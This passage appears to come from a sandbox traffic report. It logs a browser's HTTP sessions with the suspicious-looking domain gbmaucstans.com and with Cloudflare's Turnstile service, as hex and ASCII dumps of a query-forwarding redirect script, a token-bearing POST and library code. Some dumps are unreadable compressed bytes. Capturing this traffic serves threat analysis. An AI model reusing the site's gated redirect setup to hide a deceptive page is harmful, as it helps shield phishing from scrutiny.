                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 3f 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 73 70 6c 69 74 28 22 3f 22 29 5b 31 5d 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html> <body> <script>window.location.href="/index.php?" + window.location.href.split("?")[1];</script> </body></html>
                                                      Apr 16, 2024 13:56:57.910011053 CEST1217OUTPOST /main/main.php HTTP/1.1
                                                      Host: gbmaucstans.com
                                                      Connection: keep-alive
                                                      Content-Length: 560
                                                      Cache-Control: max-age=0
                                                      Upgrade-Insecure-Requests: 1
                                                      Origin: http://gbmaucstans.com
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Referer: http://gbmaucstans.com/main/
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: PHPSESSID=btpuk4floh1qk6oeujtvrton07
                                                      Data Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 6e 46 54 6a 31 6d 34 2d 70 43 70 44 76 6f 33 54 43 30 34 76 43 33 6a 66 52 32 42 58 5a 67 41 35 4f 79 75 44 46 77 30 71 4c 62 77 37 54 69 4a 71 56 65 55 4c 67 39 38 64 30 31 74 77 4b 78 65 44 72 44 49 48 68 47 4b 37 57 41 6b 43 6c 34 74 44 72 35 4e 76 44 56 5f 30 4f 61 5f 76 4e 32 49 35 44 4c 58 47 72 33 4c 6e 4f 38 76 37 7a 51 35 35 4f 50 65 71 71 7a 34 4f 74 75 33 70 37 46 67 77 4e 74 64 4c 50 66 34 34 78 72 56 5a 54 53 65 79 44 5a 33 5f 54 48 68 2d 71 46 62 47 64 31 5a 78 73 5f 44 37 52 38 52 58 6a 64 65 50 79 6b 71 6a 4f 54 2d 59 51 67 5f 6c 70 31 35 7a 6c 63 39 70 45 72 79 6f 66 66 31 70 6f 73 69 55 58 6c 79 61 31 4a 6e 79 79 58 36 69 5a 36 65 44 6a 34 55 74 53 44 59 6a 4e 6f 2d 76 33 7a 7a 64 35 75 69 7a 6d 46 44 33 48 38 5a 4b 55 35 63 6c 73 4a 38 63 69 75 71 77 4e 68 6d 68 6d 50 6f 34 6b 51 6d 47 5a 44 61 78 6e 50 70 71 48 63 76 75 63 44 55 59 6d 4b 6f 6a 69 78 72 5a 6d 64 78 38 42 45 61 55 57 37 4b 45 50 39 78 44 4e 64 6e 43 63 37 56 2d 53 71 6a 5a 5a 62 6d 73 65 6f 71 5a 4a 6c 45 44 51 42 31 4e 65 62 52 6a 51 6a 78 6b 7a 4a 4d 2d 61 38 47 42 61 4f 56 76 52 71 77 6b 42 4f 6e 4f 4d 57 5f 68 56 5a 6a 4c 6a 58 73 61 6b 55 33 75 69 54 48 4d 44 6c 4a 4c 4a 34 78 5a 32 6e 43 52 74 62 4b 61 4e 46 56 59 72 73 32 74 33 64 4a 51 30 68 5a 44 64 42 77 62 76 51 69 36 47 71 63 51 31 6c 67 46 71 64 50 50 7a 54 50 30 50 39 32 71 2e 69 4a 4f 57 75 63 46 79 6c 63 78 77 45 6e 61 70 67 37 56 63 58 77 2e 36 38 39 33 34 39 62 66 37 31 36 66 37 37 37 65 64 35 63 35 32 34 39 31 66 63 63 39 64 63 37 66 38 66 34 36 34 32 63 37 32 36 37 66 33 37 66 37 34 65 30 34 61 33 38 65 36 33 38 33 38 31 61 37
                                                      Data Ascii: cf-turnstile-response=0.nFTj1m4-pCpDvo3TC04vC3jfR2BXZgA5OyuDFw0qLbw7TiJqVeULg98d01twKxeDrDIHhGK7WAkCl4tDr5NvDV_0Oa_vN2I5DLXGr3LnO8v7zQ55OPeqqz4Otu3p7FgwNtdLPf44xrVZTSeyDZ3_THh-qFbGd1Zxs_D7R8RXjdePykqjOT-YQg_lp15zlc9pEryoff1posiUXlya1JnyyX6iZ6eDj4UtSDYjNo-v3zzd5uizmFD3H8ZKU5clsJ8ciuqwNhmhmPo4kQmGZDaxnPpqHcvucDUYmKojixrZmdx8BEaUW7KEP9xDNdnCc7V-SqjZZbmseoqZJlEDQB1NebRjQjxkzJM-a8GBaOVvRqwkBOnOMW_hVZjLjXsakU3uiTHMDlJLJ4xZ2nCRtbKaNFVYrs2t3dJQ0hZDdBwbvQi6GqcQ1lgFqdPPzTP0P92q.iJOWucFylcxwEnapg7VcXw.689349bf716f777ed5c52491fcc9dc7f8f4642c7267f37f74e04a38e638381a7
                                                      Apr 16, 2024 13:56:58.285741091 CEST1289INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Tue, 16 Apr 2024 11:56:58 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Keep-Alive: timeout=60
                                                      Vary: Accept-Encoding
                                                      X-Powered-By: PHP/5.4.16
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Pragma: no-cache
                                                      Content-Encoding: gzip
                                                      Data Raw: 31 36 31 31 0d 0a 1f 8b 08 00 00 00 00 00 02 03 d5 5c 6b 7b db 36 96 fe 3c fd 15 ac d3 56 62 62 52 b8 03 b4 a3 74 92 4e ba e9 ee a4 ed 4e da 74 32 1e 77 96 a2 48 49 36 25 ca 14 2d 39 c9 78 7f fb 9e 03 52 12 75 f5 25 4e 9f 67 dd 96 02 01 9c 83 73 7d 0f 00 cb 7d fa e5 5f 7e fa ee 97 77 3f bf 74 fa c5 30 7d f6 c5 53 fc 70 d2 70 d4 6b 1f c4 a3 03 ec 88 c3 ee b3 2f 1c f8 79 3a 8c 8b d0 89 fa 61 3e 89 8b f6 c1 af bf 7c ef 99 83 6a 28 1d 8c ce 9d 3c 4e db 07 93 7e 96 17 d1 65 e1 0c a2 6c 74 e0 f4 f3 38 69 1f f4 8b 62 3c 39 6a b5 b2 cb 22 cd b2 73 3f 4b 92 41 14 fb 51 36 6c 0d c3 41 da 4a c2 29 4e f7 e1 71 e0 14 ef c7 71 fb 60 30 0c 7b 71 eb ca b3 6c ea 02 20 2f 2f be b8 1c 4c db 07 7f f7 7e 7d ee 7d 97 0d c7 61 31 e8 a4 f1 81 03 93 8b 78 04 d2 fd f0 b2 1d 77 7b f1 41 ab 4e 3a 0a 87 c0 79 3a 88 67 63 10 b2 36 7b 36 e8 16 fd 76 37 06 29 62 cf be 1c 3a 83 d1 a0 18 84 a9 37 89 c2 34 6e 53 9f 1c 3a 97 93 38 b7 ef 21 2c d6 26 0b e6 93 e2 7d 1a 3f 73 1e a5 59 d8 1d 8c 7a 6f a2 3c 8e 47 ce 47 3b 88 3f e3 6c 02 bc b2 d1 91 93 0c ae e2 ee f1 62 a0 c8 c6 47 0e 59 be 77 b2 a2 c8 86 2b 5d 69 9c 14 2b 1d f9 a0 d7 5f ed e9 84 d1 79 2f cf 2e 47 5d 2f ca d2 2c 3f 72 1e 25 49 62 87 af ed 73 2e d8 5f b3 5e 76 6b b1 40 cd a8 29 c9 b4 ef 78 4e 40 c6 57 ee ba 4c f3 09 b3 cd 09 d6 84 47 0e 35 d0 bd ec ed c7 a5 e8 b6 bb 2e de eb 37 b7 95 6c 6e 20 ae ea 8c 37 e5 11 72 21 4f b9 86 df 0d f3 f3 dd 1e da 62 42 ce f9 3a fd 8f f1 ec 4e 2c 68 82 ff 54 5c fe 74 94 67 59 51 23 c0 1f cf 9b 6c 98 a9 ec 8f 47 d3 df 60 88 6f 1f 7a 75 e4 68 ba 39 02 26 40 22 6a 36 87 26 17 bf 55 26 9a 86 79 b3 9c ea 3a 2d 87 bb 9b 33 81 3b d7 5b b9 bf 82 21 46 b6 0f ad b0 07 26 ae f3 d8 e1 ce 13 67 b1 de ab 57 ae bb 85 f0 dd ba 5c 40 f9 c4 ae b2 75 f6 cb ab 62 0b 81 e7 98 5d 04 3f 4d e3 7c 17 51 c0 b6 10 25 69 38 7e 73 e4 04 6a 53 4f 1c 9a 2b 4a 7c 29 41 c5 92 21 fa c4 dd ce 09 f1 63 55 47 cb 05 8d bf 7c fd 0d 33 66 93 41 f7 12 e2 48 4e 16 bd d7 5f 2c 9a 8f 10 bd c2 c1 28 ce d7 62 aa 4a be ca 0f 6b 2c e7 39 b8 7d 34 1c 01 ec 96 89 d7 81 48 8e e2 6a 1e 88 e1 02 20 26 88 89 f1 36 61 fe 7c 1e bf 4f 72 80 d7 c9 9c 70 55 26 f2 f5 5a 87 85 99 3c 1c 4d 92 2c 87 7c b6 cd 34 2c e2 77 4d e2 ae 4c bc 5e 79 a3 cc 97 0f c4 8a dd 89 15 a4 c3 3e 66 fc e1 e4 92 0f 65 2b ad 7c fa 40 ac 8c 7a 30 4b 51 f2 10 fa d5 f3 20 5d ad 1d 2b 95 46 07 eb 39 3c 2f 4d 9b c0 9a 01 4e 24 69 36 3b 72 fa 83 6e 37 1e ad 8e 0e c3 bc 37 18 79 b6 34 7a 72 83 6d 35 5c 56 22 26 ab fa b6 33 65 df f4 c3 6e 36 5b 93 7a 59 f5 60 27 05 69 38 8d 57 d7 b0 6b d3 4d f8 5d 2e 7a bc 1b 08 b0 9e ec c5 02 8b 60 ab 13 3a 59 de 85 1d 4f 0e 05 ef 12 ea 14 81 7f c0 bb ce 46 69 e8 64 57 de c4 6a 04 a2 f7 3a 61 13 f6 4a e5 bf 3e 93 2e 50 09 a0 da 10
                                                      Data Ascii: 1611\k{6<VbbRtNNt2wHI6%-9xRu%Ngs}}_~w?t0}Sppk/y:a>|j(<N~elt8ib<9j"s?KAQ6lAJ)Nqq`0{ql //L~}}a1xw{AN:y:gc6{6v7)b:74nS:8!,&}?sYzo<GG;?lbGYw+]i+_y/.G]/,?r%Ibs._^vk@)xN@WLG5.7ln 7r!ObB:N,hT\tgYQ#lG`ozuh9&@"j6&U&y:-3;[!F&gW\@ub]?M|Q%i8~sjSO+J|)A!cUG|3fAHN_,(bJk,9}4Hj &6a|OrpU&Z<M,|4,wML^y>fe+|@z0KQ ]+F9</MN$i6;rn77y4zrm5\V"&3en6[zY`'i8WkM].z`:YOFidWj:aJ>.P


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.549729198.98.54.45805528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      Apr 16, 2024 13:56:35.441327095 CEST325OUTGET /favicon.ico HTTP/1.1
                                                      Host: gbmaucstans.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: PHPSESSID=btpuk4floh1qk6oeujtvrton07
                                                      Apr 16, 2024 13:56:35.569083929 CEST409INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Tue, 16 Apr 2024 11:56:35 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 135
                                                      Connection: keep-alive
                                                      Keep-Alive: timeout=60
                                                      Last-Modified: Mon, 15 Apr 2024 21:33:22 GMT
                                                      ETag: "87-616295eec6b93"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 3f 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 73 70 6c 69 74 28 22 3f 22 29 5b 31 5d 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html> <body> <script>window.location.href="/index.php?" + window.location.href.split("?")[1];</script> </body></html>
                                                      Apr 16, 2024 13:57:20.583606005 CEST6OUTData Raw: 00
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.549715198.98.54.45805528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      Apr 16, 2024 13:57:13.538239956 CEST6OUTData Raw: 00
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.549730198.98.54.45805528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      Apr 16, 2024 13:57:20.489900112 CEST6OUTData Raw: 00
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.549717104.17.3.1844435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:56:29 UTC573OUTGET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: http://gbmaucstans.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:56:30 UTC367INHTTP/1.1 302 Found
                                                      Date: Tue, 16 Apr 2024 11:56:30 GMT
                                                      Content-Length: 0
                                                      Connection: close
                                                      access-control-allow-origin: *
                                                      cross-origin-resource-policy: cross-origin
                                                      cache-control: max-age=300, public
                                                      location: /turnstile/v0/b/bcc5fb0a8815/api.js?onload=onloadTurnstileCallback
                                                      Server: cloudflare
                                                      CF-RAY: 8753fe0ce976b03f-ATL
                                                      alt-svc: h3=":443"; ma=86400


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.549718104.17.3.1844435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:56:30 UTC588OUTGET /turnstile/v0/b/bcc5fb0a8815/api.js?onload=onloadTurnstileCallback HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: http://gbmaucstans.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:56:30 UTC340INHTTP/1.1 200 OK
                                                      Date: Tue, 16 Apr 2024 11:56:30 GMT
                                                      Content-Type: application/javascript; charset=UTF-8
                                                      Content-Length: 40614
                                                      Connection: close
                                                      Access-Control-Allow-Origin: *
                                                      Cache-Control: max-age=31536000
                                                      Cross-Origin-Resource-Policy: cross-origin
                                                      Server: cloudflare
                                                      CF-RAY: 8753fe153a6ab0dc-ATL
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-16 11:56:30 UTC1029INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 2c 72 2c 74 2c 69 2c 75 2c 73 2c 6d 29 7b 74 72 79 7b 76 61 72 20 79 3d 65 5b 73 5d 28 6d 29 2c 62 3d 79 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 64 29 7b 74 28 64 29 3b 72 65 74 75 72 6e 7d 79 2e 64 6f 6e 65 3f 72 28 62 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 62 29 2e 74 68 65 6e 28 69 2c 75 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 74 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 69 2c 75 29 7b 76 61 72 20 73 3d 65 2e 61 70 70 6c 79 28 72 2c 74 29 3b 66 75 6e 63 74
                                                      Data Ascii: "use strict";(function(){function gt(e,r,t,i,u,s,m){try{var y=e[s](m),b=y.value}catch(d){t(d);return}y.done?r(b):Promise.resolve(b).then(i,u)}function yt(e){return function(){var r=this,t=arguments;return new Promise(function(i,u){var s=e.apply(r,t);funct
                                                      2024-04-16 11:56:30 UTC1369INData Raw: 74 69 6f 6e 28 75 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 75 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 69 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 5f 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 69 72 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74
                                                      Data Ascii: tion(u){return Object.getOwnPropertyDescriptor(e,u).enumerable})),t.push.apply(t,i)}return t}function _t(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):ir(Object(r)).forEach(funct
                                                      2024-04-16 11:56:30 UTC1369INData Raw: 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 54 65 28 65 2c 72 29 7b 76 61 72 20 74 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 73 5b 30 5d 26 31 29 74 68 72 6f 77 20 73 5b 31 5d 3b 72 65 74 75 72 6e 20 73 5b 31 5d 7d 2c 74 72 79 73 3a 5b 5d 2c 6f 70 73 3a 5b 5d 7d 2c 69 2c 75 2c 73 2c 6d 3b 72 65 74 75 72 6e 20 6d 3d 7b 6e 65 78 74 3a 79 28 30 29 2c 74 68 72 6f 77 3a 79 28 31 29 2c 72 65 74 75 72 6e 3a 79 28 32 29 7d 2c 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 28 6d 5b 53 79 6d 62 6f
                                                      Data Ascii: &typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Te(e,r){var t={label:0,sent:function(){if(s[0]&1)throw s[1];return s[1]},trys:[],ops:[]},i,u,s,m;return m={next:y(0),throw:y(1),return:y(2)},typeof Symbol=="function"&&(m[Symbo
                                                      2024-04-16 11:56:30 UTC1369INData Raw: 72 6d 61 6c 22 2c 65 2e 43 4f 4d 50 41 43 54 3d 22 63 6f 6d 70 61 63 74 22 2c 65 2e 49 4e 56 49 53 49 42 4c 45 3d 22 69 6e 76 69 73 69 62 6c 65 22 7d 29 28 6a 7c 7c 28 6a 3d 7b 7d 29 29 3b 76 61 72 20 49 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 49 65 7c 7c 28 49 65 3d 7b 7d 29 29 3b 76 61 72 20 66 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 66 65 7c 7c 28 66 65 3d 7b 7d 29 29 3b 76 61 72 20 47 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e
                                                      Data Ascii: rmal",e.COMPACT="compact",e.INVISIBLE="invisible"})(j||(j={}));var Ie;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Ie||(Ie={}));var fe;(function(e){e.NEVER="never",e.AUTO="auto"})(fe||(fe={}));var G;(function(e){e.NEVER="never",e.MANUAL="man
                                                      2024-04-16 11:56:30 UTC1369INData Raw: 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 65 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 55 3d 22 30 2f 30 22 3b 76 61 72 20 53 74 3d 33 30 30 2c 49 74 3d 31 30 3b 76 61 72 20 69 65 3d 22 63 66 2d 63 68 6c 2d 77 69 64 67 65 74 2d 22 2c 4d 3d 22 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 41 74 3d 22 2e 63 66 2d 74 75 72 6e 73 74 69 6c 65 22 2c 4f 74 3d 22 2e 63 66 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 52 74 3d 22 2e 67 2d 72 65 63 61 70 74 63 68 61 22 2c 43 74 3d 22 63 66 5f 63 68 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 6b 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 4e 74 3d 22 67 2d 72 65 63 61 70 74
                                                      Data Ascii: y"],e)}function et(e){return N(["render","execute"],e)}var U="0/0";var St=300,It=10;var ie="cf-chl-widget-",M="cloudflare-challenge",At=".cf-turnstile",Ot=".cf-challenge",Rt=".g-recaptcha",Ct="cf_challenge_response",kt="cf-turnstile-response",Nt="g-recapt
                                                      2024-04-16 11:56:30 UTC1369INData Raw: 72 6e 20 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 7d 2c 65 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 52 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 52 65 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 69 66 28 69 3d 3d 3d 6e 75 6c 6c 7c 7c 21 57 74 28 69 29 29 72 65 74 75 72 6e 20 69 3b 69 66 28 74 79 70 65 6f 66 20 69 21 3d 22 66 75 6e 63 74
                                                      Data Ascii: rn t.__proto__||Object.getPrototypeOf(t)},ee(e)}function Wt(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function Re(e){var r=typeof Map=="function"?new Map:void 0;return Re=function(i){if(i===null||!Wt(i))return i;if(typeof i!="funct
                                                      2024-04-16 11:56:30 UTC1369INData Raw: 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72 2e 73 72 63 29 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 69 3d 30 2c 75 3b 75 3d 74 5b 69 5d 3b 69 2b 2b 29 69 66 28 43 28 75 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 75 2e 73 72 63 29 29 72 65 74 75 72 6e 20 75 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 29 7b 76 61 72 20 65 3d 72 74 28 29 3b 65 7c 7c 76 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c
                                                      Data Ascii: MLScriptElement)&&e.test(r.src))return r;for(var t=document.querySelectorAll("script"),i=0,u;u=t[i];i++)if(C(u,HTMLScriptElement)&&e.test(u.src))return u}function Bt(){var e=rt();e||v("Could not find Turnstile script tag, some features may not be availabl
                                                      2024-04-16 11:56:30 UTC1369INData Raw: 6f 67 28 22 54 75 72 6e 73 74 69 6c 65 20 57 69 64 67 65 74 20 73 65 65 6d 20 74 6f 20 68 61 76 65 20 63 72 61 73 68 65 64 3a 20 22 2c 62 29 3b 76 61 72 20 6c 3b 69 66 28 28 41 3d 65 2e 6d 73 67 48 61 6e 64 6c 65 72 29 3d 3d 3d 6e 75 6c 6c 7c 7c 41 3d 3d 3d 76 6f 69 64 20 30 7c 7c 41 2e 63 61 6c 6c 28 65 2c 7b 64 61 74 61 3a 7b 73 6f 75 72 63 65 3a 4d 2c 77 69 64 67 65 74 49 64 3a 62 2c 63 6f 64 65 3a 53 65 2c 65 76 65 6e 74 3a 22 66 61 69 6c 22 2c 72 63 56 3a 28 6c 3d 64 2e 72 63 56 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 55 7d 7d 29 2c 72 29 7b 76 61 72 20 6f 3b 77 69 6e 64 6f 77 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 7b 73 6f 75 72 63 65 3a 4d 2c 77 69 64 67 65 74 49 64 3a 62 2c 65 76 65 6e 74 3a 22 72 63 76 2d 75 70 64 61
                                                      Data Ascii: og("Turnstile Widget seem to have crashed: ",b);var l;if((A=e.msgHandler)===null||A===void 0||A.call(e,{data:{source:M,widgetId:b,code:Se,event:"fail",rcV:(l=d.rcV)!==null&&l!==void 0?l:U}}),r){var o;window.postMessage({source:M,widgetId:b,event:"rcv-upda
